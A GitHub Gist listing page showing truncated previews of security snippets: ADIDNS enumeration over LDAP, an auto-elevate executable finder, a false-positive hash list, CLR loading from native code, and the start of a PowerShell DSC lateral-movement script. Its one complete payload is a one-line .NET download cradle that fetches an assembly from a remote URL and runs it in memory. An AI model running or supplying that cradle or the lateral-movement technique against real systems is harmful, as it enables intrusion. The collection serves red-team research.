Skip to content

Instantly share code, notes, and snippets.

🎯
Infosec

Franci Šacer fsacer

🎯
Infosec
Block or report user

Report or block fsacer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@3xocyte
3xocyte / adidns_records.py
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
View adidns_records.py
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
View windows-toolkit.md

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
@Evilcry
Evilcry / findautoelevate.ps1
Created Jul 8, 2018
Enumerate executables with auto-elevation enabled
View findautoelevate.ps1
# Find Autoelevate executables
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true"
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true"
@Neo23x0
Neo23x0 / fp-hashes.py
Last active Mar 10, 2020
Typical False Positive Hashes
View fp-hashes.py
# This GIST has been transformed into a Git repository and does not receive updates anymore
#
# Please visit the github repo to get a current list
# https://github.com/Neo23x0/ti-falsepositives/
# Hashes that are often included in IOC lists but are false positives
HASH_WHITELIST = [
# Empty file
'd41d8cd98f00b204e9800998ecf8427e',
'da39a3ee5e6b4b0d3255bfef95601890afd80709',
@cobbr
cobbr / DotnetAssemblyDownloadCradle.cs
Created Jun 20, 2018
A download cradle for .NET assemblies.
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@xpn
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@LiveOverflow
LiveOverflow / software_update.sage
Created Mar 16, 2018
34C3 CTF software_update (crypto)
View software_update.sage
import sage.all
import hashlib
# part1 - https://www.youtube.com/watch?v=Vgdhlh6evjI
# part2 - https://www.youtube.com/watch?v=EOlddNofKxo
# prepare a table of bits
def bits_of(x):
bits = []
for c in "{:08b}".format(x):
View PowerShellHostFinder.ps1
# Author: Matt Graeber, SpecterOps
ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % {
try {
$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName)
if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') {
$_.FullName
}
} catch {}
}
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
You can’t perform that action at this time.